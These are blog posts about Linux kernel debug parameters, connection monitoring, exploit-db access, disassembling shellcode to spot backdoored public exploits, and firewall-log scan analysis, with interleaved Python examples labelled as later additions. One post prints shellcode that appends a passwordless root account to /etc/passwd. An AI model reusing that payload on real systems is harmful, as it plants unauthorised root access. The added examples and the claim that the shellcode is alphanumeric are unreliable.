<b>LOGLEVEL</b> = enables level 8 logging.<br />
<b>earlyprintk</b> = enables early printing of kernel messages to the VGA screen.<br />
<b>,keep</b> = keeps the early console enabled even after the regular console has taken over.<br />
<b>sched_debug</b> = Enables verbose scheduler debug messages.<br />
<br />
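To confirm that a booted kernel actually received these parameters, the live command line can be read back from /proc/cmdline. The following is an added Python 3 example, not from the original post: it parses a kernel command line into name/value pairs, checks for each parameter listed above with the value the post uses, and validates log_buf_len as a size. The EXPECTED_DEBUG_PARAMS table and the function names are this example's own assumptions.

```python
"""Audit a Linux kernel command line for the verbose-logging parameters
listed above. Added example (not from the original post); Python 3."""
import os
import shlex

# The additions the post makes to the GRUB 'kernel' line. A value of None
# means a bare flag; otherwise the value the post uses.
EXPECTED_DEBUG_PARAMS = {
    "debug": None,
    "ignore_loglevel": None,
    "log_buf_len": "10M",
    "print_fatal_signals": "1",
    # kernel-parameters.txt documents the console filter as lowercase
    # 'loglevel='; names are case-sensitive, and an unrecognised NAME=value
    # is handed to init's environment instead. With ignore_loglevel present
    # the filter is bypassed anyway, so this entry stays as the post wrote it.
    "LOGLEVEL": "8",
    "earlyprintk": "vga,keep",
    "sched_debug": None,
}


def parse_cmdline(cmdline):
    """Split a kernel command line into {name: value}; bare flags map to None.
    shlex handles double-quoted values ("a b") the way the kernel does."""
    params = {}
    for token in shlex.split(cmdline):
        name, sep, value = token.partition("=")
        params[name] = value if sep else None
    return params


def parse_size(text):
    """Convert a log_buf_len-style size ('10M', '64K', '4096') to bytes."""
    units = {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}
    text = text.strip()
    if text and text[-1].upper() in units:
        return int(text[:-1]) * units[text[-1].upper()]
    return int(text)


def audit_debug_params(cmdline, expected=EXPECTED_DEBUG_PARAMS):
    """Return findings (strings) for expected parameters that are missing or
    carry a different value. An empty list means everything is set."""
    params = parse_cmdline(cmdline)
    findings = []
    for name, wanted in expected.items():
        if name not in params:
            findings.append("missing: %s" % name)
        elif wanted is not None and params[name] != wanted:
            findings.append("%s=%s (expected %s)" % (name, params[name], wanted))
    # log_buf_len must be a size the kernel can parse; report garbage values.
    if params.get("log_buf_len") is not None:
        try:
            parse_size(params["log_buf_len"])
        except ValueError:
            findings.append("log_buf_len is not a size: %r" % params["log_buf_len"])
    return findings


if __name__ == "__main__":
    # On a running Linux system the live command line is in /proc/cmdline.
    if os.path.exists("/proc/cmdline"):
        with open("/proc/cmdline") as fh:
            live = fh.read().strip()
    else:  # constructed sample so the script also runs elsewhere
        live = "root=/dev/sda1 ro quiet"
    for finding in audit_debug_params(live) or ["all debug parameters present"]:
        print(finding)
```

Run it once after rebooting into the modified GRUB entry; an empty finding list means the bootloader passed every parameter through as written.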
Ref:<br />
<a href="http://www.kernel.org/doc/Documentation/kernel-parameters.txt">http://www.kernel.org/doc/Documentation/kernel-parameters.txt</a><br />
<a href="https://wiki.archlinux.org/index.php/GRUB#Advanced_Debugging">https://wiki.archlinux.org/index.php/GRUB#Advanced_Debugging</a></div>

customized slow output on a console [2011-03-04]<div dir="ltr" style="text-align: left;" trbidi="on">One of the primary scripts I run in the urxvt terminals embedded in my desktop is an active-connections display script. Its primary function is to use 'netstat' and 'lsof' to display all TCP/UDP connections to/from my system. The problem comes when running apps such as Firefox or feed readers, where so many connections are established that most of the output scrolls away very fast. So I customized the script to output slowly, line by line:<br />
<br />
<span style="font-size: x-small;">#!/bin/bash<br />
# Poll active connections and print them slowly enough to read in a small<br />
# terminal. Each poll is staged in connpoll.log before being displayed.<br />
LOG=connpoll.log<br />
: > "$LOG"<br />
<br />
# Print the staged file one line at a time, pausing after every 12 lines.<br />
read_file()<br />
{<br />
    count=0<br />
    while IFS= read -r line<br />
    do<br />
        printf '%s\n' "$line"<br />
        count=$((count + 1))<br />
        sleep .15<br />
        if [ "$count" -eq 12 ]<br />
        then<br />
            count=0<br />
            sleep 3<br />
        fi<br />
    done < "$LOG"<br />
}<br />
<br />
while true<br />
do<br />
    echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA LSOF==<<<<<<<<<<<" > "$LOG"<br />
    lsof -w | grep -e TCP -e UDP >> "$LOG"<br />
    echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA NETSTAT==<<<<<<<<<<<" >> "$LOG"<br />
    netstat --tcp --udp -e -e -a --raw --program -v >> "$LOG"<br />
    read_file<br />
    sleep 8<br />
done</span><br />
<br />
The infinite while loop runs the 2 commands, directs the output to a file (connpoll.log) and executes the function 'read_file'. 'read_file' takes the file and feeds it to an internal read in its while loop, which simply echoes a line from the file. The 'sleep .15' provides a small time break between each line and makes the output smooth.<br />
<br />
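An added alternative (not the author's script, and Python 3 rather than bash) that tackles the same scroll-away problem from the other side: instead of pacing the full listing, it keeps the previous poll of the connection table and prints only the sockets that appeared or disappeared since, which is also the view a defender wants when an unexpected listener shows up. The netstat output below is a constructed sample; the 'netstat -tuapn' column layout and the Conn fields are assumptions of this example.

```python
"""Print only what changed between two polls of the connection table, an
alternative to pacing the full listing. Added example, not the author's
script; Python 3. The sample netstat output below is constructed."""
import subprocess
import time
from collections import namedtuple

Conn = namedtuple("Conn", "proto local remote state program")

# Constructed sample of 'netstat -tuapn' output, two successive polls.
SAMPLE_POLL_1 = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 192.168.1.10:52344      93.184.216.34:443       ESTABLISHED 2314/firefox
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1021/dhcpcd
"""
SAMPLE_POLL_2 = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1021/dhcpcd
"""


def parse_netstat(text):
    """Parse tcp/udp rows into a set of Conn tuples; header lines are skipped.
    UDP rows carry no State column, so their program field sits one column
    further left; program names containing spaces are re-joined."""
    conns = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith(("tcp", "udp")):
            continue
        proto, local, remote = fields[0], fields[3], fields[4]
        if proto.startswith("tcp"):
            if len(fields) < 7:
                continue  # truncated row
            state, program = fields[5], " ".join(fields[6:])
        else:
            state, program = "", " ".join(fields[5:])
        conns.add(Conn(proto, local, remote, state, program))
    return conns


def diff_connections(previous, current):
    """Return (opened, closed): sockets that appeared since the last poll and
    sockets that went away."""
    return current - previous, previous - current


def format_delta(opened, closed):
    """One line per change, '+' for new and '-' for closed, sorted for stable
    output. A new LISTEN socket owned by no recognised program is the kind of
    line worth a second look."""
    lines = ["+ %s %s -> %s %s %s" % c for c in sorted(opened)]
    lines += ["- %s %s -> %s %s %s" % c for c in sorted(closed)]
    return lines


def poll_live():
    """Run netstat on this host; returns None if netstat is unavailable."""
    try:
        out = subprocess.run(["netstat", "-tuapn"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        return None
    return parse_netstat(out)


if __name__ == "__main__":
    previous = poll_live()
    if previous is None:  # no netstat here: walk the constructed samples
        delta = diff_connections(parse_netstat(SAMPLE_POLL_1),
                                 parse_netstat(SAMPLE_POLL_2))
        for line in format_delta(*delta):
            print(line)
    else:
        while True:  # same 8-second cadence as the post's script
            time.sleep(8)
            current = poll_live()
            for line in format_delta(*diff_connections(previous, current)):
                print(line)
            previous = current
```

Because only deltas are printed, the terminal stays readable no matter how many connections Firefox holds open; the trade-off is that the first poll prints nothing, so the full table still needs one conventional listing at startup.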
The pacing script above works flawlessly and with the least overhead that I could accomplish.</div>

exploitdb svn up again [2011-03-04]<div dir="ltr" style="text-align: left;" trbidi="on">For the past 2 weeks, an svn checkout of exploit-db always resulted in:<br />
<br />
<b>svn: Network connection closed unexpectedly</b><br />
<br />
Today, it's finally up again. Grab a local copy via:<br />
<br />
$] svn co svn://<a href="http://www.exploit-db.com/exploitdb" target="_blank">www.exploit-db.com/exploitdb</a><br />
<br />
or, to update a local copy, just do an 'svn update' in the checkout folder. </div>

dangers of publicly disclosed weaponized exploits [2011-02-24]<div dir="ltr" style="text-align: left;" trbidi="on">POC (Proof of Concept) exploits are very easy to find. One doesn't have to look further than a Google search for countless lists. Similarly, weaponized versions are also available through the same channels. Skiddies never had it so good when it comes to downloading, compiling and owning the next-door neighbour's box. But sometimes such perfect pieces of art have a terrible secret.<br />
<br />
Most skiddies never bother to even look at the code before compiling/running it. They just can't wait to see the familiar 'C:\..' or '#' prompts on their consoles. The payload provided with an exploit may be a proper bind/reverse stager, or it may even be a piece of malware!<br />
<br />
Let's be honest and think like a skiddie for once. I want to pwn a box, I fire up nmap and see that port xxx is open on the other end. I google for a 'port xxx exploit' and get some code from a disclosure website, written in C. Instructions say to compile and run. A quick look at the code may not reveal any problems, at least in the higher-level C, but does the shellcode check out? For that matter, it may well be a double-edged sword. It could very well download something onto the skiddie's box, run it and hand both his system and the victim's system to the 'real' cracker.<br />
<br />
There are ways to analyze payloads by converting them back to assembly. Using a simple disassembler, the original assembly code can be rebuilt and understood.<br />
<br />
As a simple example, let's take the following shellcode:<br />
<b>\x31\xc0\x40\x89\xc3\xcd\x80</b><br />
<br />
Any shellcoder would easily recognize this as a simple exit() syscall shellcode, used as a "hello world!" alternative in teaching shellcoding. All we need to do is convert it, write it out as a binary file and disassemble it. The disassembler we are going to use is ndisasm (<a href="http://www.nasm.us/doc/nasmdoca.html">Netwide Disassembler</a>).<br />
<br />
I have written a small python script for this very purpose:<br />
<br />
<blockquote><span style="font-size: x-small;">#!/usr/bin/python<br />
#s4ndman - shellcode to assembly conversion script for shellcode inspection.<br />
#Requires: ndisasm (Netwide Disassembler). Runs under Python 2 or 3.<br />
from __future__ import print_function<br />
import binascii<br />
import os<br />
import subprocess<br />
import sys<br />
<br />
if len(sys.argv) < 2:<br />
    print("[i]run syntax:")<br />
    print("[i]" + sys.argv[0] + " hexcode")<br />
    print("[i]example:")<br />
    print("[i]" + sys.argv[0] + " \\x31\\xc0\\x40\\x89\\xc3\\xcd\\x80")<br />
    sys.exit(1)<br />
<br />
# An unquoted \x on the shell command line arrives as a bare 'x', so both<br />
# forms of the prefix are stripped before decoding.<br />
hstring = sys.argv[1].replace("\\x", "").replace("x", "")<br />
print("[+]normalized hexstring: " + hstring)<br />
try:<br />
    code = binascii.a2b_hex(hstring)<br />
except (TypeError, ValueError) as e:<br />
    print("[-]not a valid hex string: " + str(e))<br />
    sys.exit(1)<br />
<br />
try:<br />
    f = open("binary", "wb")<br />
except IOError:<br />
    print("[-]file create error!")<br />
    sys.exit(1)<br />
f.write(code)<br />
f.close()<br />
<br />
print("[++++++++++++++++ASM DUMP++++++++++++++++]")<br />
subprocess.call(["ndisasm", "-b", "32", "binary"])  # decode as 32-bit x86<br />
print("[++++++++++++++++ASM DUMP++++++++++++++++]")<br />
<br />
os.remove("binary")<br />
sys.exit(0)</span></blockquote>Let's try it, shall we:<br />
<blockquote><span style="font-size: x-small;">└─>>$] python2 shellcode_2_asm.py \x31\xc0\x40\x89\xc3\xcd\x80<br />
[+]normalized hexstring: 31c04089c3cd80<br />
[++++++++++++++++ASM DUMP++++++++++++++++]<br />
00000000 31C0 xor eax,eax<br />
00000002 40 inc eax<br />
00000003 89C3 mov ebx,eax<br />
00000005 CD80 int 0x80<br />
[++++++++++++++++ASM DUMP++++++++++++++++]</span></blockquote>And there we go, the 32-bit exit() syscall assembly.<br />
<br />
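Before handing untrusted shellcode to ndisasm, it helps to normalise whichever textual form it was published in and get a quick summary of what the bytes do. The following is an added Python 3 example, not the post's own shellcode_2_asm.py: it goes beyond the script above by accepting several encodings (escaped, shell-stripped, 0x-prefixed, spaced or bare hex), tagging each int 0x80 with a best-guess syscall number from the bytes that load EAX just before it, and listing embedded printable strings such as file paths. Both samples from this post are built in; ndisasm is only invoked when it is installed. The syscall table, the 10-byte look-back window and the function names are assumptions of this example.

```python
"""Normalise the textual forms shellcode is published in and take a first,
heuristic look at what it does before (or without) running ndisasm on it.
Added example, not the post's own shellcode_2_asm.py; Python 3."""
import os
import re
import shutil
import subprocess
import tempfile

# Linux i386 syscall numbers that appear in small teaching shellcodes.
I386_SYSCALLS = {1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open",
                 6: "close", 11: "execve", 0x66: "socketcall"}

# The two samples from the post: the exit() shellcode as typed on the
# command line, and the /etc/passwd one as its normalised hex string.
SAMPLE_EXIT = r"\x31\xc0\x40\x89\xc3\xcd\x80"
SAMPLE_PASSWD = ("eb385e31c088460b88462bc6462a0a8d5e0c895e2c8d1e66b9420466baa401"
                 "b005cd8089c331d28b4e2cb21fb004cd80b006cd80b00131dbcd80e8c3ff"
                 "ffff2f6574632f70617373776423746f6f723a3a303a303a743030723a2f"
                 "726f6f743a2f62696e2f626173682023")

_BYTE = re.compile(r"(?:\\x|0x|x)?([0-9a-fA-F]{2})")


def normalize_shellcode(text):
    """Accept '\\x31\\xc0', 'x31xc0' (what an unquoted \\x becomes on the shell
    command line), '0x31,0xc0', '31 c0' or bare '31c0', with any quotes, commas
    or whitespace left over from a C string, and return the raw bytes."""
    cleaned = re.sub(r"""["';,\s]""", "", text)
    if not re.fullmatch(r"(?:(?:\\x|0x|x)?[0-9a-fA-F]{2})*", cleaned):
        raise ValueError("not a hex byte string: %r" % text)
    return bytes.fromhex("".join(_BYTE.findall(cleaned)))


def syscall_hints(code, window=10):
    """For each int 0x80 (CD 80) report how EAX was last loaded in the bytes
    just before it: mov al,imm8 (B0 xx), mov eax,imm32 (B8 ...), or
    xor eax,eax (31 C0) followed by n inc eax (40). Returns a list of
    (offset, syscall number or None, name). Heuristic: it matches byte
    patterns rather than decoded instructions, so confirm against ndisasm."""
    hints = []
    pos = code.find(b"\xcd\x80")
    while pos != -1:
        number = None
        for i in range(pos - 1, max(pos - window, 0) - 1, -1):
            if code[i] == 0xB0 and i + 1 < pos:
                number = code[i + 1]
                break
            if code[i] == 0xB8 and i + 5 <= pos:
                number = int.from_bytes(code[i + 1:i + 5], "little")
                break
            if code[i:i + 2] == b"\x31\xc0":
                j = i + 2
                while j < pos and code[j] == 0x40:
                    j += 1
                number = j - (i + 2)
                break
        hints.append((pos, number, I386_SYSCALLS.get(number, "?")))
        pos = code.find(b"\xcd\x80", pos + 2)
    return hints


def printable_strings(code, min_len=4):
    """Runs of printable ASCII at least min_len long: paths, user names and
    commands embedded in the payload show up here."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, code)]


def disassemble(code, bits=32):
    """Run ndisasm over the bytes (via a temp file) and return its listing, or
    None when ndisasm is not installed."""
    if shutil.which("ndisasm") is None:
        return None
    with tempfile.NamedTemporaryFile(delete=False) as fh:
        fh.write(code)
        path = fh.name
    try:
        return subprocess.run(["ndisasm", "-b", str(bits), path],
                              capture_output=True, text=True, check=True).stdout
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for label, sample in (("exit", SAMPLE_EXIT), ("passwd", SAMPLE_PASSWD)):
        code = normalize_shellcode(sample)
        print("[%s] %d bytes, %d null bytes" % (label, len(code), code.count(0)))
        for offset, number, name in syscall_hints(code):
            print("  int 0x80 at 0x%02x: eax=%s (%s)" % (offset, number, name))
        for s in printable_strings(code):
            print("  string: %r" % s)
        listing = disassemble(code)
        print(listing if listing else "  (ndisasm not found; listing skipped)")
```

On the post's second sample the hints come out as open, write, close and exit, and the string scan surfaces the /etc/passwd path, which is exactly the kind of thing a quick read of the C wrapper would never show; the full ndisasm listing then confirms what the heuristic guessed.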
Also we can take the alphanumeric version of the shellcode I <a href="http://mmaptonull.blogspot.com/2011/02/some-old-shellcode.html">posted</a> a while back and get the same output:<br />
<br />
<span style="font-size: x-small;">python2 shellcode_2_asm.py \xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23</span><br />
<span style="font-size: x-small;">[+]normalized hexstring: eb385e31c088460b88462bc6462a0a8d5e0c895e2c8d1e66b9420466baa401b005cd8089c331d28b4e2cb21fb004cd80b006cd80b00131dbcd80e8c3ffffff2f6574632f70617373776423746f6f723a3a303a303a743030723a2f726f6f743a2f62696e2f626173682023</span><br />
<span style="font-size: x-small;">[++++++++++++++++ASM DUMP++++++++++++++++]</span><br />
<span style="font-size: x-small;">00000000 EB38 jmp short 0x3a</span><br />
<span style="font-size: x-small;">00000002 5E pop esi</span><br />
<span style="font-size: x-small;">00000003 31C0 xor eax,eax</span><br />
<span style="font-size: x-small;">00000005 88460B mov [esi+0xb],al</span><br />
<span style="font-size: x-small;">00000008 88462B mov [esi+0x2b],al</span><br />
<span style="font-size: x-small;">0000000B C6462A0A mov byte [esi+0x2a],0xa</span><br />
<span style="font-size: x-small;">0000000F 8D5E0C lea ebx,[esi+0xc]</span><br />
<span style="font-size: x-small;">00000012 895E2C mov [esi+0x2c],ebx</span><br />
<span style="font-size: x-small;">00000015 8D1E lea ebx,[esi]</span><br />
<span style="font-size: x-small;">00000017 66B94204 mov cx,0x442</span><br />
<span style="font-size: x-small;">0000001B 66BAA401 mov dx,0x1a4</span><br />
<span style="font-size: x-small;">0000001F B005 mov al,0x5</span><br />
<span style="font-size: x-small;">00000021 CD80 int 0x80</span><br />
<span style="font-size: x-small;">00000023 89C3 mov ebx,eax</span><br />
<span style="font-size: x-small;">00000025 31D2 xor edx,edx</span><br />
<span style="font-size: x-small;">00000027 8B4E2C mov ecx,[esi+0x2c]</span><br />
<span style="font-size: x-small;">0000002A B21F mov dl,0x1f</span><br />
<span style="font-size: x-small;">0000002C B004 mov al,0x4</span><br />
<span style="font-size: x-small;">0000002E CD80 int 0x80</span><br />
<span style="font-size: x-small;">00000030 B006 mov al,0x6</span><br />
<span style="font-size: x-small;">00000032 CD80 int 0x80</span><br />
<span style="font-size: x-small;">00000034 B001 mov al,0x1</span><br />
<span style="font-size: x-small;">00000036 31DB xor ebx,ebx</span><br />
<span style="font-size: x-small;">00000038 CD80 int 0x80</span><br />
<span style="font-size: x-small;">0000003A E8C3FFFFFF call dword 0x2</span><br />
<span style="font-size: x-small;">0000003F 2F das</span><br />
<span style="font-size: x-small;">00000040 657463 gs jz 0xa6</span><br />
<span style="font-size: x-small;">00000043 2F das</span><br />
<span style="font-size: x-small;">00000044 7061 jo 0xa7</span><br />
<span style="font-size: x-small;">00000046 7373 jnc 0xbb</span><br />
<span style="font-size: x-small;">00000048 .........</span><br />
<span style="font-size: x-small;">[++++++++++++++++ASM DUMP++++++++++++++++]</span><br />
<span style="font-size: x-small;">NOTE: From offset 0x3F onwards the bytes are the string db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'. The disassembler treats the string as instructions and emits assembly for it, so everything from that point on can safely be ignored.</span><br />
<br />
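A Python 3 take on the same tool, added here as an example (it is not the post's script): normalize_shellcode() accepts the escaped form the post uses, the form an unquoted shell argument turns it into, C-style "0x31, 0xc0" and bare hex, and disassemble() wraps ndisasm the way the script does but with a temporary file and an argument list instead of a shell command string. The function names are my own.<br />

```python
import re
import shutil
import subprocess
import sys
import tempfile

# Added example, not the post's shellcode_2_asm.py.
# normalize_shellcode() accepts "\x31\xc0", "x31xc0" (what bash leaves after
# eating the backslashes), "0x31, 0xc0" and "31c0" / "31 c0".
_SEPARATORS = re.compile(r"[\s,;\"']")


def normalize_shellcode(text: str) -> bytes:
    """Return the raw bytes encoded by a hex string in any of the forms above."""
    s = _SEPARATORS.sub("", text).lower()
    if "\\x" in s:              # "\x31\xc0": drop the escape prefixes
        s = s.replace("\\x", "")
    elif s.startswith("0x"):    # "0x310xc0" once separators are gone
        s = s.replace("0x", "")
    elif "x" in s:              # "x31xc0": hex digits never contain 'x'
        s = s.replace("x", "")
    if len(s) % 2 or not re.fullmatch(r"[0-9a-f]+", s):
        raise ValueError(f"not a hex byte string: {text!r}")
    return bytes.fromhex(s)


def disassemble(code: bytes, bits: int = 32) -> str:
    """Disassemble code with ndisasm; bits is the post's '-b' switch (16, 32 or 64).

    The temporary file is removed automatically (no 'rm binary' step) and the
    arguments go to ndisasm as a list, so no shell interprets them."""
    if bits not in (16, 32, 64):
        raise ValueError("bits must be 16, 32 or 64")
    if shutil.which("ndisasm") is None:
        raise RuntimeError("ndisasm (part of NASM) is not on PATH")
    with tempfile.NamedTemporaryFile(suffix=".bin") as tmp:
        tmp.write(code)
        tmp.flush()
        result = subprocess.run(
            ["ndisasm", "-b", str(bits), tmp.name],
            capture_output=True, text=True, check=True,
        )
    return result.stdout


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"usage: {sys.argv[0]} hexcode [bits]\n"
              f"example: {sys.argv[0]} '\\x31\\xc0\\x40\\x89\\xc3\\xcd\\x80' 32")
        sys.exit(1)
    code = normalize_shellcode(sys.argv[1])
    bits = int(sys.argv[2]) if len(sys.argv) > 2 else 32
    print("[+]normalized hexstring:", code.hex())
    print(disassemble(code, bits))
```

The second argument replaces the "edit the -b switch" step from the notes: `python3 shellcode_2_asm.py '\x31\xc0...' 64` disassembles as 64-bit code.<br />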
A few points to note here:<br />
1. The script assumes 32-bit shellcode; for 64-bit shellcode change the line <span style="font-size: small;">"</span><span style="font-size: small;">ndisasm -b 32 binary" to "</span><span style="font-size: small;">ndisasm -b 64 binary"</span>.<br />
2. Download and run exploits with utmost caution and, where possible, <b>use custom payloads</b>.<br />
<b>3.</b> <b>DON'T BE A SKIDDIE!</b></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-63915555555780457672011-02-23T08:02:00.000-08:002011-03-04T11:14:48.509-08:00examining firewall log entries...<div dir="ltr" style="text-align: left;" trbidi="on">While going through the usual iptables log, it's pretty interesting to see what lurks out on the world wide web. There are some usual and unusual entries, such as:<br />
<br />
<span style="font-size: x-small;"><b>localhost kernel: iptables DENIED:</b> IN=ppp0 OUT= MAC= <b>SRC=xxx.xxx.xx.x</b><b> DST=y</b><b>yy.yyy.yyy.yyy</b> LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=61742 DF PROTO=TCP <b>SPT=4993 <span style="font-size: small;">DPT=23</span></b> SEQ=2106909432 ACK=0 WINDOW=5808 RES=0x00 <b>SYN </b>URGP=0 OPT (020405AC0402080A012E13D60000000001030300)</span><br />
<br />
<span style="font-size: x-small;"><b>localhost kernel: iptables DENIED:</b> IN=ppp0 OUT= MAC= <b>SRC=xx.xxx.xxx.x DST=</b></span><span style="font-size: x-small;"><b>yyy.yyy.yyy.yyy</b></span><span style="font-size: x-small;"> LEN=40 TOS=0x00 PREC=0x00 TTL=95 ID=256 PROTO=TCP <b>SPT=6000 <span style="font-size: small;">DPT=1433</span> </b>SEQ=2031616000 ACK=0 WINDOW=16384 RES=0x00 <b>SYN </b>URGP=0</span><br />
<br />
<span style="font-size: x-small;"><b>localhost kernel: iptables DENIED:</b> IN=ppp0 OUT= MAC= <b>SRC=xxx.xxx.xx.xxx DST=</b></span><span style="font-size: x-small;"><b>yyy.yyy.yyy.yyy</b></span><span style="font-size: x-small;"> LEN=40 TOS=0x00 PREC=0x00 TTL=119 ID=256 DF PROTO=TCP <b>SPT=12200</b> <span style="font-size: small;"><b>DPT=1080</b></span> SEQ=474681 ACK=0 WINDOW=8192 RES=0x00 <b>SYN</b> URGP=0</span> <br />
<br />
Upon analysis, these reveal some pretty interesting facts...<br />
<br />
1. Firstly, I notice a lot of TCP SYN packets being denied at ports 1080, 3128, 8000, 8080, etc.<br />
2. Also a lot of attempts at ports 1433 and 1434.<br />
3. And finally some random attempts at 22, 23 and 25.<br />
<br />
What's interesting is that the source IPs are all random and, in some cases, the same IP is flagged on two ports.<br />
<br />
<br />
These are what I think may be the causes:<br />
<br />
1. A simple lookup would reveal the purpose of these ports as the following:<br />
<b>1080 : socks</b><br />
<b>3128 : squid-http</b><br />
<b>8000 : http-alt</b><br />
<b>8080 : http-proxy</b><br />
With this, one can easily deduce that many systems on the web are intentionally or unintentionally checking for open proxies on random IP addresses. These may be normal boxes running scripts or programs that generate random IPs or work from old server connection logs; they may also be infected systems whose malware performs the same task. This is one of the many ways lists of open proxies surface on underground websites.<br />
<br />
2. These are the ports on which <b>Microsoft SQL</b> Server typically listens, and they may well be sought after by full-blown malware looking for new prey or by automated scans running on a cracker's box.<br />
<br />
3. These are the usual ports for the <b>ssh</b>, <b>telnet</b> and <b>smtp</b> services, and they are most probably being scanned for vulnerabilities or vulnerable configurations by malware on rooted boxes or by automated/active scans running on a cracker's box.<br />
<br />
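The analysis above, as an added example that is not part of the post: a small Python script that parses iptables DENIED lines of this shape, counts denied SYNs per destination port, labels each port with one of the three explanations, and lists sources that hit more than one port. The log lines inside it are constructed in the same format with RFC 5737 documentation addresses, not real traffic.<br />

```python
import re
from collections import Counter, defaultdict

# Added example, not code from the post. Constructed sample lines in the
# netfilter LOG format shown above; addresses are from the RFC 5737
# documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24).
SAMPLE_LOG = """\
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=192.0.2.10 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=61742 DF PROTO=TCP SPT=4993 DPT=23 SEQ=2106909432 ACK=0 WINDOW=5808 RES=0x00 SYN URGP=0 OPT (020405AC0402080A012E13D60000000001030300)
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=192.0.2.55 DST=198.51.100.7 LEN=40 TOS=0x00 PREC=0x00 TTL=95 ID=256 PROTO=TCP SPT=6000 DPT=1433 SEQ=2031616000 ACK=0 WINDOW=16384 RES=0x00 SYN URGP=0
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=192.0.2.55 DST=198.51.100.7 LEN=40 TOS=0x00 PREC=0x00 TTL=95 ID=256 PROTO=TCP SPT=6000 DPT=1434 SEQ=2031616000 ACK=0 WINDOW=16384 RES=0x00 SYN URGP=0
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=203.0.113.9 DST=198.51.100.7 LEN=40 TOS=0x00 PREC=0x00 TTL=119 ID=256 DF PROTO=TCP SPT=12200 DPT=1080 SEQ=474681 ACK=0 WINDOW=8192 RES=0x00 SYN URGP=0
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=203.0.113.9 DST=198.51.100.7 LEN=40 TOS=0x00 PREC=0x00 TTL=119 ID=256 DF PROTO=TCP SPT=12201 DPT=8080 SEQ=474682 ACK=0 WINDOW=8192 RES=0x00 SYN URGP=0
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=192.0.2.77 DST=198.51.100.7 LEN=78 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=5353 DPT=5353 LEN=58
"""

# The port lookup from the post, plus the three groups its explanations use.
PORT_SERVICES = {
    22: "ssh", 23: "telnet", 25: "smtp",
    1080: "socks", 3128: "squid-http", 8000: "http-alt", 8080: "http-proxy",
    1433: "ms-sql-s", 1434: "ms-sql-m",
}
PORT_GROUPS = {
    "open-proxy sweep": {1080, 3128, 8000, 8080},
    "MS SQL sweep": {1433, 1434},
    "remote-access/mail probe": {22, 23, 25},
}
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
_KV = re.compile(r"(\w+)=(\S*)")


def parse_line(line):
    """Return a dict for a DENIED line, or None for anything else.

    The LOG target writes KEY=VALUE tokens; TCP flags (and DF) are bare tokens."""
    if "iptables DENIED:" not in line:
        return None
    fields = dict(_KV.findall(line))
    flags = {tok for tok in line.split() if tok in TCP_FLAGS}
    return {
        "src": fields.get("SRC", ""),
        "dst": fields.get("DST", ""),
        "proto": fields.get("PROTO", ""),
        "spt": int(fields["SPT"]) if fields.get("SPT") else None,
        "dpt": int(fields["DPT"]) if fields.get("DPT") else None,
        "ttl": int(fields["TTL"]) if fields.get("TTL") else None,
        "flags": flags,
    }


def summarize(log_text):
    """Count denied TCP SYNs per destination port and collect sources that
    probed more than one port (the "two ports per IP" pattern)."""
    syn_per_port = Counter()
    ports_per_src = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or "SYN" not in rec["flags"]:
            continue
        syn_per_port[rec["dpt"]] += 1
        ports_per_src[rec["src"]].add(rec["dpt"])
    multi_port = {src: sorted(p) for src, p in ports_per_src.items() if len(p) > 1}
    return syn_per_port, multi_port


def classify(port):
    """Map a destination port to one of the post's three explanations."""
    for label, ports in PORT_GROUPS.items():
        if port in ports:
            return label
    return "other"


def report(log_text):
    syn_per_port, multi_port = summarize(log_text)
    lines = []
    for port, n in sorted(syn_per_port.items()):
        lines.append(f"DPT={port:<5} {PORT_SERVICES.get(port, '?'):<11} "
                     f"{n} SYN  [{classify(port)}]")
    for src, ports in sorted(multi_port.items()):
        lines.append(f"{src} probed ports {ports}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

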